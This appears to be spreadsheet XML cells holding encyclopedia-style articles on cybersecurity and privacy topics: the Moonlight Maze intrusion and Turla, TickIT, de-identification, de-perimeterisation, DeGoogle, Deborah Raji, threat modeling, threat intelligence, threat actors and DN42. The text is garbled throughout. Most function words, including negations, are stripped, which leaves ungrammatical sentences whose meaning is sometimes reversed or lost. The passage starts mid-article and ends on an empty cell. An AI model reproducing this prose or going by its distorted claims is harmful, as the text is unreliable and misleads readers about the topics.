highest bidder" "the value stolen information tens millions, perhaps hundreds millions dollars." information recovered hack included classified naval codes data missile-guidance systems, well highly valued military data. they also stole tens thousands files containing technical research, military maps, u.s. troop configurations, military hardware designs, encryption techniques, unclassified crucial data relating pentagon's war-planning, could sold enemies united states. these attacks serious implications regarding ability defend itself. with information acquired attack, hackers might able cripple missile defense systems cause unimaginable amount damage. juan andres guerrero-saade, senior security researcher kaspersky lab, stated "the analysis moonlight maze samples fascinating archaeological study; also reminder well-resourced adversaries aren’t going anywhere, it’s defend systems skills match." connection turla turla russian-language threat actor known covert exfiltration tactics hijacked satellite connections, waterholing government websites, covert channel backdoors, rootkits, deception tactics. group's roots trace back famous agent.btz, computer virus ability replicate well scan steal data. virus used briefly cripple united states military, described "the significant breach u.s. military computers ever" senior pentagon official. this dates rise prominence around 2006–2007, years agent.btz, almost years events moonlight maze. was't many years later, however, information would come linking turla moonlight maze. group consisting kaspersky's guerrero-saade costin raiu, king's college london's thomas danny moore able track retired administrator owner 1998 server used proxy moonlight maze. this huge breakthrough considering long period presumed inactivity (almost years). they used server threat actor, able retrieve complete attackers code, almost year thorough analysis, able find connection rare linux samples used turla moonlight maze (the code shared related backdoor used loki information tunneling program released 1996). also 2020 united states federal government data breach cyberwarfare russia ghostnet operation aurora titan rain references</t>
  </si>
  <si>
    <t>TickIT</t>
  </si>
  <si>
    <t>tickit certification program companies software development computer industries, supported primarily united kingdom swedish industries ukas swedac respectively. general objective improve software quality. history 1980s, government's ccta organisation promoted standards public sector, work bs5750 (quality management) leading publishing quality management library inception tickit assessment scheme dti, participation software development companies. tickitplus tickit scheme updated become tickitplus, website tickitplus available. tickitplus adds dimension existing tickit scheme combining industry best practice international standards. provides 9001:2008 accredited certification capability grading sizes types organisations. cross-references iso/iec 15504 (information technology process assessment) iso/iec 12207 (systems software engineering software life cycle processes) amongst others. addition promotes auditor practitioner competency training within established qualification standards. functions addition general objective improving software quality, principles tickit improve regulate behaviour auditors working information technology sector training, subsequent certification auditors. international register certificated auditors manages registration scheme tickit auditors. software development organizations seeking tickit certification required show conformity 9000. major objective provide industry practical framework management software development quality developing effective quality management system certification procedures. these involved: publishing guidance material assist software organizations interpret requirements 9001 training, selecting registering auditors experience competence, introducing rules accreditation certification bodies practising software sector tickit guide tickit also includes guide. this provides guidance understanding applying 9001 industry. gives background tickit scheme, including origins objectives. furthermore, provides detailed information implement quality system expected structure content relevant software activities. tickit guide also assists defining appropriate measures and/or metrics. tickit guide contains official guidance material tickit. directed wide audience: senior managers operational staff software suppliers in-house development teams, purchasers users software based systems, certification bodies accreditation authorities, third party internal auditors, auditor training course providers consultants. part introduction tickit certification process this presents general information operation tickit relates quality initiatives process improvement. part guidance customers this describes issues relating quality management system certification software field viewpoint customer initiating development project, explains customer contribute quality delivered products services. part guidance suppliers this presents information guidance software software service providing organizations, including house developers, construction quality management systems using tickit procedures. this part also indicates organizations assess improve effectiveness quality management systems. part guidance auditors this gives guidance auditors conduct assessments using tickit procedures. part software quality management system requirements standards perspective this contains guidance help organizations producing software products providing software-related services interpret requirements 9001:2000. follows clause sequence standard. part software quality management system requirements process perspective this identifies elaborates upon good practice required provide effective continuous control software quality management system. organized around basic processes required software development, maintenance support follows structure iso/iec 12207:1995. appendix management assessment processes appendix case study: using efqm excellence model appendix case study: iso/iec 15504 compatible process assessments appendix case study: software process improvement cmmsm standards information references glossary terms references bamford, robert; deibler, william (2003). 9001: 2000 software systems providers: engineering approach (1st ed.). crc-press. isbn 0-8493-2063-1 isbn 978-0849320637 external links tickitplus irca certification bodies</t>
  </si>
  <si>
    <t>De-anonymization</t>
  </si>
  <si>
    <t>De-identification</t>
  </si>
  <si>
    <t>de-identification process used prevent someone's personal identity revealed. example, data produced human subject research might de-identified preserve privacy research participants. biological data de-identified order comply hipaa regulations define stipulate patient privacy laws. when applied metadata general data identification, process also known data anonymization. common strategies include deleting masking personal identifiers, personal name, suppressing generalizing quasi-identifiers, date birth. reverse process using de-identified data identify individuals known data re-identification. successful re-identifications cast doubt de-identification's effectiveness. systematic review fourteen distinct re-identification attacks found high re-identification rate dominated small-scale studies data de-identified according existing standards".de-identification adopted main approaches toward data privacy protection. commonly used fields communications, multimedia, biometrics, data, cloud computing, data mining, internet, social networks, audio–video surveillance. examples designing surveys when surveys conducted, census, collect information specific group people. encourage participation protect privacy survey respondents, researchers attempt design survey people participate survey, possible match participant's individual response(s) data published. before using information when online shopping website wants know users' preferences shopping habits, decides retrieve customers' data database analysis them. personal data information include personal identifiers collected directly customers created accounts. website needs pre-handle data de-identification techniques analyzing data records avoid violating customers' privacy. anonymization anonymization refers irreversibly severing data identity data contributor study prevent future re-identification, even study organizers condition. de-identification also include preserving identifying information re-linked trusted party certain situations. there debate technology community whether data re-linked, even trusted party, ever considered de-identified. techniques common strategies de-identification masking personal identifiers generalizing quasi-identifiers. pseudonymization main technique used mask personal identifiers data records k-anonymization usually adopted generalizing quasi-identifiers. pseudonymization pseudonymization performed replacing real names temporary deletes masks personal identifiers make individuals unidentified. this method makes possible track individual's record time even though record updated. however, prevent individual identified specific combinations attributes data record indirectly identify individual. k-anonymization k-anonymization defines attributes indirectly points individual's identity quasi-identifiers (qis) deal data making least individuals combination values. values handled following specific standards. example, k-anonymization replaces original data records range values keep values unchanged. combination values prevents individual identified also avoid destroying data records. applications research de-identification driven mostly protecting health information. some libraries adopted methods used healthcare industry preserve readers' privacy.in data, de-identification widely adopted individuals organizations. with development social media, e-commerce, data, de-identification sometimes required often used data privacy users' personal data collected companies third-party organizations analyze personal usage. smart cities, de-identification required protect privacy residents, workers visitors. without strict regulation, de-identification difficult sensors still collect information without consent. limits whenever person participates genetics research, donation biological specimen often results creation large amount personalized data. such data uniquely difficult de-identify.anonymization genetic data particularly difficult huge amount genotypic information biospecimens, ties specimens often medical history, advent modern bioinformatics tools data mining. there demonstrations data individuals aggregate collections genotypic data sets tied identities specimen donors.some researchers suggested reasonable ever promise participants genetics research retain anonymity, instead, participants taught limits using coded identifiers de-identification process. de-identification laws united states america 2014, united states president's council advisors science technology found de-identification "somewhat useful added safeguard" useful basis policy" robust near‐term future re‐identification methods".the hipaa privacy rule provides mechanisms using disclosing health data responsibly without need patient consent. these mechanisms center hipaa de-identification standards safe harbor expert determination method. safe harbor relies removal specific patient identifiers (e.g. name, phone number, email address, etc.), expert determination method requires knowledge experience generally accepted statistical scientific principles methods render information individually identifiable. safe harbor safe harbor method uses list approach de-identification requirements: removal generalization elements data. that covered entity business associate actual knowledge residual information data could used alone, combination information, identify individual. safe harbor highly prescriptive approach de-identification. under method, dates must generalized year codes reduced three digits. approach used data regardless context. even information shared trusted researcher wishes analyze data seasonal variations acute respiratory cases and, thus, requires month hospital admission, information cannot provided; year admission would retained. expert determination expert determination takes risk-based approach de-identification applies current standards best practices research determine likelihood person could identified protected health information. this method requires person appropriate knowledge experience generally accepted statistical scientific principles methods render information individually identifiable. requires: that risk small information could used alone, combination reasonably available information, anticipated recipient identify individual subject information; documents methods results analysis justify determination. research decedents research electronic health record data hipaa privacy rule. this allows electronic health record deceased subjects research (hipaa privacy rule (section 164.512(i)(1)(iii))). also genetic privacy statistical disclosure control references external links simson garfinkel (2015-12-16). "nistir 8053, de-identification personal information" (pdf). nist. retrieved 2016-01-03. training series united states government de-identification standards guidance regarding methods de-identification protected health information ohm, paul (2010). "broken promises privacy: responding surprising failure anonymization" (pdf). ucla review. 1701–77. padilla-lópez, josé ramón; chaaraoui, alexandros andre; flórez-revuelta, francisco (june 2015). "visual privacy protection methods: survey" (pdf). expert systems applications. (9): 4177–4195. doi:10.1016/j.eswa.2015.01.041. hdl:10045/44523. chaaraoui, alexandros; padilla-lópez, josé; ferrández-pastor, francisco; nieto-hidalgo, mario; flórez-revuelta, francisco 2014). vision-based system intelligent monitoring: human behaviour analysis privacy context". sensors. (5): 8895–8925. bibcode:2014senso..14.8895c. doi:10.3390/s140508895. 4063058. pmid 24854209.</t>
  </si>
  <si>
    <t>De-perimeterisation</t>
  </si>
  <si>
    <t>information security, de-perimeterisation removal boundary organisation outside world. de-perimeterisation protecting organization's systems data multiple levels using mixture encryption, secure computer protocols, secure computer systems data-level authentication, rather reliance organization network boundary internet. successful implementation de-perimeterised strategy within organization implies perimeter, outer security boundary, removed. metaphorically, de-perimeterisation similar historic dismantling city walls allow free flow goods information. achieve shift city states nation states creation standing armies, city boundaries extended surround multiple cities. de-perimeterisation coined measham, former employee uk's royal mail research paper, subsequently used jericho forum royal mail founding member. potential benefits claims made removal border include freeing business-to-business transactions, reduction cost ability company agile. taken furthest extent organisation could operate securely directly internet. operating without hardened border frees organizations collaborate, utilizing solutions based collaboration oriented architecture framework. variations more recently term used context result entropy deliberate activities individuals within organizations usurp perimeters often well-intentioned reasons. latest jericho forum paper named "collaboration oriented architecture" refers trend de-perimeterisation problem: problem traditional electronic boundary corporate ‘private’) network internet breaking trend called de-perimeterisation. variations term used describe aspects de-perimeterisation "you’ve already de-perimeterised" describe internet worms viruses designed by-pass border using e-mail. "re-perimeterisation" describe interim step moving perimeters protection groups computer servers data centre rather perimeter. "macro-perimeterisation" moving security perimeter "the cloud", security service, examples security services cloud exemplified email cleaning services proxy filtering services provided towers internet. "micro-perimeterisation" moving security perimeter surround data itself, interim steps might include moving perimeter around individual computer systems individual application (consisting cluster computers). references external links http://www.jerichoforum.org http://www.opengroup.org</t>
  </si>
  <si>
    <t>DeGoogle</t>
  </si>
  <si>
    <t>degoogle movement (also called de-google movement) grassroots campaign spawned privacy advocates urge users stop using google products entirely growing privacy concerns regarding company. term refers removing google one's life. growing market share internet giant creates monopolistic power company digital spaces, increasing numbers journalists noted difficulty find alternatives company's products. some projects, ungoogled-chromium, primarily distinguish google-maintained products lessened dependence company's infrastructure. seen part broader opposition tech companies, sometimes referred "techlash." history 2013, john koetsier venturebeat said amazon's kindle fire android-based tablet de-google-ized version android." 2014 john simpson news wrote “right forgotten” google search engines. 2015, derek scally irish times wrote article "de-google life." 2016 kris carlon android authority suggested users cyanogenmod could “de-google” phones, cyanogenmod works fine without google apps too. 2018 nick lucchesi inverse wrote protonmail promoting able completely de-google-fy life.” lifehacker's brendan hesse wrote detailed tutorial "quitting google." gizmodo journalist kashmir hill claims missed meetings difficulties organizing meet without google calendar. 2019, huawei gave refund phone owners philippines inhibited using services provided google alternatives exist absence company's products made normal internet unfeasible. 2020, huawei launched petal alternative google search. also 2020, kashmir hill wrote article avoiding large tech companies discussed disabling google prevented using dropbox, uber, lyft, yelp, described amazon google embedded architecture digital world even competitors rely services." 2021, tencent contributed degoogle movement fully buying search engine, sogou. 2022, comic artist activist leah elliott published creative commons comic criticizing google chrome's privacy practices, entitled "contra chrome." also criticism google tech alt-tech references external links framasoft's internet degoogling project: degooglisons-internet</t>
  </si>
  <si>
    <t>Deborah Raji</t>
  </si>
  <si>
    <t>inioluwa deborah raji nigerian-canadian computer scientist activist works algorithmic bias, accountability, algorithmic auditing. raji previously worked buolamwini, timnit gebru, algorithmic justice league researching gender racial bias facial recognition technology. also worked google’s ethical team research fellow partnership institute york university working operationalize ethical considerations machine learning engineering practice. current mozilla fellow, recognized technology review forbes world's young innovators. early life education raji born port harcourt, nigeria moved mississauga, ontario four years old. eventually family moved ottawa, canada. studied engineering science university toronto, graduating 2019. 2015, founded project include, nonprofit providing increased student access engineering education, mentorship, resources income immigrant communities greater toronto area. career research raji worked buolamwini media algorithmic justice league, audited commercial facial recognition technologies microsoft, amazon, ibm, face++, kairos. they found technologies significantly less accurate darker-skinned women white men. with support researchers increased public pressure campaigning, work amazon agree support facial recognition regulation later halt sale product police least year. raji also interned machine learning startup clarifai, worked computer vision model flagging images.she participated research mentorship program google worked ethical team creating model cards, documentation framework transparent machine learning model reporting. also co-led development internal auditing practices google. contributions google separately presented published aaai conference conference fairness, accountability, transparency.in 2019, raji summer research fellow partnership working setting industry machine learning transparency standards benchmarking norms. raji tech fellow institute worked algorithmic auditing. currently, fellow mozilla foundation researching algorithmic auditing evaluation.raji's work bias facial recognition systems highlighted 2020 documentary coded bias directed shalini kantayya. selected awards 2019 venture beat innovations award category good (received buolamwini timnit gebru) 2020 technology review under innovator award 2020 pioneer award (received buolamwini gebru) 2021 forbes under award enterprise technology 2021 brilliant women ethics hall fame honoree references</t>
  </si>
  <si>
    <t>Threat model</t>
  </si>
  <si>
    <t>threat modeling process potential threats, structural vulnerabilities absence appropriate safeguards, identified enumerated, countermeasures prioritized. purpose threat modeling provide defenders systematic analysis controls defenses need included, given nature system, probable attacker's profile, likely attack vectors, assets desired attacker. threat modeling answers questions like “where vulnerable attack?”, “what relevant threats?”, “what need safeguard threats?”. conceptually, people incorporate form threat modeling daily life even realize commuters threat modeling consider might wrong morning journey work take preemptive action avoid possible accidents. children engage threat modeling determining best path toward intended goal avoiding playground bully. formal sense, threat modeling used prioritize military defensive preparations since antiquity. evolution it-based threat modeling shortly shared computing made debut early 1960s individuals began seeking ways exploit security vulnerabilities personal gain. result, engineers computer scientists soon began developing threat modeling concepts information technology systems. early it-based threat modeling methodologies based concept architectural patterns first presented christopher alexander 1977. 1988 robert barnard developed successfully applied first profile it-system attacker. 1994, edward amoroso forth concept “threat tree” book, “fundamentals computer security technology.” concept threat tree based decision tree diagrams. threat trees graphically represent potential threat system exploited. independently, similar work conducted darpa structured graphical representation specific attacks it-systems could executed. resulting representation called “attack trees.” 1998 bruce schneier published analysis cyber risks utilizing attack trees paper entitled “toward secure system engineering methodology.” paper proved seminal contribution evolution threat modeling it-systems. schneier's analysis, attacker's goal represented “root node,” potential means reaching goal represented “leaf nodes.” utilizing attack tree allowed cybersecurity professionals systematically consider multiple attack vectors defined target. 1999, microsoft cybersecurity professionals loren kohnfelder praerit garg developed model considering attacks relevant microsoft windows development environment. (stride acrostic for: spoofing identity, tampering data, repudiation, information disclosure, denial service, elevation privilege) resultant mnemonic helps security professionals systematically determine potential attacker could utilize threat included stride. 2003, octave (operationally critical threat, asset, vulnerability evaluation) method, operations-centric threat modeling methodology, introduced focus organizational risk management. 2004, frank swiderski window snyder wrote “threat modeling,” microsoft press. developed concept using threat models create secure applications. 2014 ryan stillions expressed idea cyber threats expressed different semantic levels, proposed (detection maturity level) model. attack instantiation threat scenario caused specific attacker specific goal mind strategy reaching goal. goal strategy represent highest semantic levels model. this followed (tactics, techniques procedures) represent intermediate semantic levels. lowest semantic levels model tools used attacker, host observed network artifacts packets payloads, finally atomic indicators addresses lowest semantic level. current siem (security information event management) tools typically provide indicators lowest semantic levels. there therefore need develop siem tools provide threat indicators higher semantic levels. threat modeling methodologies purposes conceptually, threat modeling practice flows methodology. numerous threat modeling methodologies available implementation. typically, threat modeling implemented using four approaches independently, asset-centric, attacker-centric, software-centric. based volume published online content, methodologies discussed well known. stride methodology stride approach threat modeling introduced 1999 microsoft, providing mnemonic developers find 'threats products'. stride, patterns practices, asset/entry point amongst threat modeling approaches developed published microsoft. references "the" microsoft methodology commonly mean stride data flow diagrams. p.a.s.t.a. process attack simulation threat analysis (pasta) seven-step, risk-centric methodology. provides seven-step process aligning business objectives technical requirements, taking account compliance issues business analysis. intent method provide dynamic threat identification, enumeration, scoring process. once threat model completed, security subject matter experts develop detailed analysis identified threats. finally, appropriate security controls enumerated. this methodology intended provide attacker-centric view application infrastructure defenders develop asset-centric mitigation strategy. trike focus trike methodology using threat models risk-management tool. within framework, threat models used satisfy security auditing process. threat models based “requirements model.” requirements model establishes stakeholder-defined “acceptable” level risk assigned asset class. analysis requirements model yields threat model threats enumerated assigned risk values. completed threat model used construct risk model based asset, roles, actions, calculated risk exposure. vast visual, agile simple threat (vast) methodology, based threatmodeler, commercial automated threat-modeling platform. vast requires creating types models: application threat models operational threat models. application threat models process-flow diagrams, representing architectural point view. operational threat models created attacker point view based dfds. this approach allows integration vast organization's development devops lifecycles. generally accepted threat modeling processes it-related threat modeling processes start creating visual representation application infrastructure analyzed. application infrastructure decomposed various elements analysis. once completed, visual representation used identify enumerate potential threats. further analysis model regarding risks associated identified threats, prioritization threats, enumeration appropriate mitigating controls depends methodological basis threat model process utilized. identification enumeration threats mitigation objectives), either carried attack-centric asset-centric way. former focuses types possible attacks shall mitigated, whereas latter focuses assets shall protected. visual representations based data flow diagrams microsoft methodology, pasta, trike develop visual representation application-infrastructure utilizing data flow diagrams (dfd). dfds developed 1970s tool system engineers communicate, high level, application caused data flow, stored, manipulated infrastructure upon application runs. traditionally, dfds utilize four unique symbols: data flows, data stores, processes, interactors. early 2000s, additional symbol, trust boundaries, added allow dfds utilized threat modeling. once application-infrastructure system decomposed five elements, security experts consider identified threat entry point known threat categories. once potential threats identified, mitigating security controls enumerated additional analysis performed. further fields application threat modeling applied also areas vehicle, building home automation. context, threats security privacy like information inhabitant's movement profiles, working times, health situations modeled well physical network-based attacks. latter could make available smart building features, i.e., sensors (e.g., inhabitant) actuators (e.g., unlock doors). references</t>
  </si>
  <si>
    <t>Threat intelligence</t>
  </si>
  <si>
    <t>threat intelligence "cyclical practice" planning, collecting, processing, analyzing disseminating information poses threat applications systems. threat intelligence collects information real-time showcase threat landscape identifying threats computer, application network. this information gathered number resources compiled single database enabling visibility vulnerabilities exploits actively used internet wild) threat actors. threat intelligence confused vulnerability management. platforms exist enable automation threat intelligence. these platforms commonly referred "tips" threat intelligence platforms. security analysts utilize platforms collection data automation. threat intelligence platform typically used security operations center teams (soc) threat response events occur. generalized threat intelligence teams platform make educated predictions based actors, campaigns, industry targets well platform (network, application, hardware) targets. management executive teams platform reporting share data high levels better understand threat posture. packaged product obtains information multiple resources automates intelligence managing, collecting integrating various platforms. anomali provides threat intelligence model based intelligence platform. some defined threat intelligence including data sensors honeypots deployed across internet darkweb, traps provide advance metrics state internet intent adversaries. examples companies technologies include lupovis.io, orpheus-cyber,,flashpoint, others. other types threat intelligence might include automated darkweb scanning, mass internet scanning, tactics techniques procedures gathering ,which attempts together adversary strategies order increase defender's understanding provide situational awareness. also cyber threat intelligence vulnerability management references external links https://dl.acm.org/doi/10.1145/3243734.3243829 https://www.darkreading.com/threat-intelligence.asp https://securityintelligence.com/posts/chess-entropy-patterns-threat-intelligence-models/ https://patents.google.com/patent/us8813228b2/en https://dl.acm.org/doi/abs/10.1145/3243734.3243829 https://pennstate.pure.elsevier.com/en/publications/network-security-situation-awareness-framework-based-on-threat-in http://stixproject.github.io/about/stix_whitepaper_v1.1.pdf https://ieeexplore.ieee.org/abstract/document/7568916</t>
  </si>
  <si>
    <t>Threat actor</t>
  </si>
  <si>
    <t>threat actor malicious actor either person group people take part action intended cause harm cyber realm including: computers, devices, systems, networks. term typically used describe individuals groups perform malicious acts person organization type size. threat actors engage cyber related offenses exploit open vulnerabilities disrupt operations. threat actors different educational backgrounds, skills, resources. frequency classification cyber attacks changes rapidly. background threat actors helps dictate target, attack, information seek. there number threat actors including: cyber criminals, nation-state actors, ideologues, thrill seekers/trolls, insiders, competitors. these threat actors distinct motivations, techniques, targets, uses stolen data. background development cyberspace brought advantages disadvantages society. while cyberspace helped technological innovation, also brought various forms cyber crime. since dawn cyberspace, individual, group, nation-state threat actors engaged cyber related offenses exploit victim vulnerabilities. there number threat actor categories different motives targets. cyber criminals cyber criminals main objectives. first, want take infiltrate system access valuable data items. second, want ensure avoid legal consequence infiltrating system. cyber criminal broken three sub-groups: mass scammers/automated hackers, criminal infrastructure providers, game hunters.mass scammers automated hackers include cyber criminals attacks system gain monetary success. these threat actors tools infect organization computer systems. they seek gain financial compensation victims retrieve data. criminal infrastructure providers group threat actors tools infect computer system organization. criminal infrastructure providers sell organization's infrastructure outside organization exploit system. typically, victims criminal infrastructure providers unaware system infected. game hunters another sub-group cyber criminals attack single, high-value target. game hunters spend extra time learning target, including system architecture technologies used target. victims targeted email, phone attacks social engineering skills. nation-state threat actors nation-state threat actors gain intelligence national interest. nation-state actors interested number sectors, including nuclear, financial, technology information. there ways nations nation-state actors. first, nations make governmental intelligence agencies. second, nations work organizations specialize cyber crime. states outside groups tracked; however, states might necessarily take accountability conducted outside group. nation-state actors attack nations outside organizations, including private companies non-governmental organizations. they typically bolster nation-state's counterintelligence strategy. nation-state attacks include: strategic sabotage critical infrastructure attacks. nation states considered incredibly large group threat actors cyber realm. ideologues (hacktivists terrorists) threat actors considered ideologues include groups attackers: hackers terrorists. these groups attackers grouped together similar goals. however, hacktivists terrorists differ commit cyber crimes. hacktivism term coined early days world wide web. derived combination words: hacking activism. hacktivists typically individuals entities ready commit cyber crimes beliefs ideologues. many hactivists include anti-capitalists anti-corporate idealists attacks inspired similar political social issues. terrorism includes individuals groups people cause terror achieve goals. main difference hacktivists terrorists goal. hacktivists willing break security laws spread message terrorists cause terror achieve goals. ideologues, unlike types threat actors, typically motivated financial incentives. thrill seekers trolls thrill seeker type threat actor attacks system sole purpose experimentation. thrill seekers interested learning computer systems networks operate want much data infiltrate within computer system. while cause major damage, cause problems organization's system. time gone thrill seekers evolved modern trolls. similar thrill seekers, troll type person group attacks system recreation. however, unlike thrill seekers, trolls cause malice. modern trolls cause misinformation harm. insiders competitors insiders type threat actor either insider sells network information adversaries, disgruntled employee feels like need retaliate feel like treated unfairly. insider attacks challenging prevent; however, structured logging analysis plan place, insider threat actors detected successful attack. business competitors another threat actor harm organizations. competitors gain access organization secrets typically secure. organizations gain stronger knowledge business intelligence protect competition threat actor. identified threat actors internet research agency organizations identify threat actors government organizations united states (us) national institute standards technology (nist) national institute standards technology (nist) government agency works issues dealing cyber security national level. nist written reports cyber security guidelines, including guidelines conducting risk assessments. nist typically classifies cyber threat actors national governments, terrorists, organized crime groups, hactivists, hackers.european union (eu) european union agency cybersecurity (enisa) european union agency cybersecurity european union-based agency tasked working cyber security capabilities. enisa provides research assistance information security experts within this organization published cyber threat report 2019. goal report identify incidents published attribute attacks likely threat actor. latest report identifies nation-states, cyber criminals, hactivists, cyber terrorists, thrill seekers.united nations (un) united nations general assembly (unga) also working bring awareness issues cyber security. unga came report 2019 regarding developments field information telecommunications context international security. this report identified following threat actors: nation-states, cyber criminals, hactivists, terrorist groups, thrill seekers, insiders.canada canadian centre cyber security (cccs) canada defines threat actors states, groups, individuals cause harm exploiting vulnerability malicious intent. threat actor must trying gain access information systems access alter data, devices, systems, networks.japan national center incident readiness strategy (nisc) japanese government's national center incident readiness strategy (nisc) established 2015 create "free, fair secure cyberspace" japan. nics created cybersecurity strategy 2018 outlines nation-states cybercrime threats. also indicates terrorist usage cyberspace needs monitored understood.russia security council russian federation security council russian federation published cyber security strategy doctrine 2016. this strategy highlights following threat actors risk cyber security measures: nation-state actors, cyber criminals, terrorists. non-government organizations crowdstrike crowdstrike cybersecurity technology company antivirus company publishes annual threat report. 2021 global threat report reports nation-states cybercriminals major threats cyber security.fireeye fireeye cybersecurity firm involved detecting preventing cyber attacks. publishes report detected threat trends annually, containing results customers sensor systems. their threat report lists state sponsored actors, cyber criminals insiders current threats.mcafee mcafee american global computer security software company. company publishes quarterly threat report identifies issues cybersecurity. october 2021 threat report outlines cybercriminals biggest threats field.verizon verizon american multinational telecommunications company provided threat report based past customer incidents. they following questions defining threat actors: "who behind event? this could external “bad guy” launches phishing campaign employee leaves sensitive documents seat back pocket". they outline nation state actors cybercriminals types threat actors report. techniques phishing phishing method threat actors obtain sensitive data, including usernames, passwords, credit card information, social security numbers. phishing attacks typically occur threat actor sends message designed trick victim either revealing sensitive information threat actor deploy malicious software victim's system.cross-site scripting cross-site scripting type security vulnerability found threat actor injects client-side script otherwise safe trusted applications. code launches infectious script onto victim's system. this allows threat actor access sensitive data.sql injections injection code injection technique used threat actors attack data-driven applications. threat actors inject malicious statements. this allows threat actors extract, alter, delete victim's information.denial service attacks denial-of-service attack (dos attack) cyber-attack threat actor seeks make automated resource unavailable victims temporarily indefinitely disrupting services network host. threat actors conduct attack overwhelming network false requests disrupt operations. references</t>
  </si>
  <si>
    <t>Threat Intelligence Platform</t>
  </si>
  <si>
    <t>threat intelligence platform emerging technology discipline helps organizations aggregate, correlate, analyze threat data multiple sources real time support defensive actions. tips evolved address growing amount data generated variety internal external resources (such system logs threat intelligence feeds) help security teams identify threats relevant organization. importing threat data multiple sources formats, correlating data, exporting organization’s existing security systems ticketing systems, automates proactive threat management mitigation. true differs typical enterprise security products system programmed outside developers, particular, users platform. tips also apis gather data generate configuration analysis, whois information, reverse lookup, website content analysis, name servers, certificates. traditional approach enterprise security traditional approach enterprise security involves security teams using variety processes tools conduct incident response, network defense, threat analysis. integration teams sharing threat data often manual process relies email, spreadsheets, portal ticketing system. this approach scale team enterprise grows number threats events increases. with attack sources changing minute, hour, day, scalability efficiency difficult. tools used large security operations centers (socs), example, produce hundreds millions events day, endpoint network alerts events, making difficult filter manageable number suspicious events triage. threat intelligence platforms threat intelligence platforms make possible organizations gain advantage adversary detecting presence threat actors, blocking tackling attacks, degrading infrastructure. using threat intelligence, businesses government agencies also identify threat sources data useful relevant environment, potentially reducing costs associated unnecessary commercial threat feeds.tactical cases threat intelligence include security planning, monitoring detection, incident response, threat discovery threat assessment. also drives smarter practices back siems, intrusion detection, security tools finely curated, relevant, widely sourced threat intelligence produces. advantage held tips, ability share threat intelligence stakeholders communities. adversaries typically coordinate efforts, across forums platforms. provides common habitat makes possible security teams share threat information among trusted circles, interface security intelligence experts, receive guidance implementing coordinated counter-measures. full-featured tips enable security analysts simultaneously coordinate tactical strategic activities incident response, security operations, risk management teams aggregating data trusted communities. threat intelligence platform capabilities threat intelligence platforms made several primary feature areas allow organizations implement intelligence-driven security approach. these stages supported automated workflows streamline threat detection, management, analysis, defensive process track completion: collect collects aggregates multiple data formats multiple sources including csv, stix, xml, json, iodek, openioc, email various feeds. differs siem platform. while siems handle multiple feeds, less well suited importing analyzing unstructured formats regularly required analysis. effectiveness heavily influenced quality, depth, breadth timeliness sources selected. most tips provide integration major commercial open-source intelligence sources. correlate allows organizations begin automatically analyze, correlate, pivot data actionable intelligence who, given attack gained blocking measures introduced. automation processing feeds critical. enrichment contextualization build enriched context around threats, must able automatically augment, allow threat intelligence analysts third party threat analysis applications augment threat data. this enables teams much data possible regarding certain threat actor, capabilities, infrastructure properly threat. usually enrich collected data information geolocation, networks various information sources domain blocklists. analyze automatically analyzes content threat indicators relationships enable production usable, relevant, timely threat intelligence data collected. this analysis enables identification threat actor's tactics, techniques procedures (ttps). addition, visualization capabilities help depict complex relationships allow users pivot reveal greater detail subtle relationships. proven method analysis within framework diamond model intrusion analysis. diamond model enables teams build clear picture adversaries operate inform overall response effectively. this process helps teams refine place data context develop effective action plan. example, threat intelligence analyst perform relationship modeling phishing email determine sent received email, domains registered addresses resolve domain, etc. from here, analyst pivot reveal domains resolver, internal hosts connect host/domain name requests attempted. diamond model differs cyber kill chain® approach (attributed lockheed martin) theorizes that, defender, organization needs disrupt link chain compromise attack. however, stages attack apparent defender. while reconnaissance steps detectable attacker browsing victim’s website, weaponization stage remains hidden. diamond model, however, focuses understanding attacker (their ttps motivations). instead looking series events, model looks relationships features help defenders better understand threat. this ensures effective overall response. rather play whack-a-mole persistent threats, organizations build picture operate take steps address facts directly. integrate integrations requirement tip. data platform needs find back security tools products used organization. full-featured tips enable flow information collected analyzed feeds, etc. disseminate integrate cleaned data network tools including siems, internal ticketing systems, firewalls, intrusion detection systems, more. furthermore, apis allow automation actions without direct user involvement. mature threat intelligence platform deployment also handles response processing. built-in workflows processes accelerate collaboration within security team wider communities like information sharing analysis centers (isacs) information sharing analysis organizations (isaos), teams take control course action development, mitigation planning, execution. this level community participation can’t achieved without sophisticated threat intelligence platform. powerful tips enable communities create tools applications used continue change game security professionals. model, analysts developers freely share applications another, choose modify applications, accelerate solution development plug-and-play activities. addition, threat intelligence also acted upon strategically inform necessary network security architecture changes optimize security teams. collaborate threat intelligence platform also allows people collaborate internal well external stakeholders. operational deployments threat intelligence platforms deployed software appliance (physical virtual) on-premises dedicated public clouds enhanced community collaboration. references external links threat intelligence platforms: next 'must-have' harried security operations teams, wilson, dark reading, 6/2/2015 open source threat intelligence sources: abuse.ch, malcode</t>
  </si>
  <si>
    <t>Decentralized network 42</t>
  </si>
  <si>
    <t>decentralized network (also known dn42) decentralized peer-to-peer network built using vpns software/hardware routers. while darknets establish anonymity participants, dn42 aims for. network explore routing technologies used internet tries establish direct non-nat-ed connections members. network fully meshed. dn42 uses mostly tunnels instead physical links individual networks. each participant connected participants. over physical links, used inter routing. while ospf commonly used protocol intra routing, participant free choose igp, like babel, inside technical setup address space network address space ipv4 consists private subnets: 172.20.0.0/14 main subnet. note private address ranges also announced dn42, network interconnected similar projects. most notably, chaosvpn uses 172.31.0.0/16 parts 10.0.0.0/8, freifunk icvpn uses 10.0.0.0/8 neonetwork uses 10.127.0.0/16.for ipv6, unique local address (ula, ipv6 equivalent private address range) (fd00::/8) used. please note network ipv6 addresses range well, including neonetwork's fd10:127::/32. numbers order bgp, even private environment, autonomous system numbers needed. dn42 uses several private reserved numbers ranges, including 64512 64855 76100 76199. since june 2014, dn42 using private range, 4242420000 4242429999, part larger private range defined 6996. routers while participants hardware routers, participants general purpose servers virtual machines lower cost. commonly used implementation used dn42 bird frr, participants openbgpd, xorp, gobgp implementation junos cisco ios. dn42 websites services hosted dn42 network often dn42 top-level domain. dn42 official iana top-level domain, handled dn42 registry. internal anycast servers dn42 found 172.20.0.53, 172.23.0.53, fd42:d42:d42:54::1, fd42:d42:d42:53::1. references external links official website</t>
  </si>
  <si>
    <t>Deception technology</t>
  </si>
  <si>
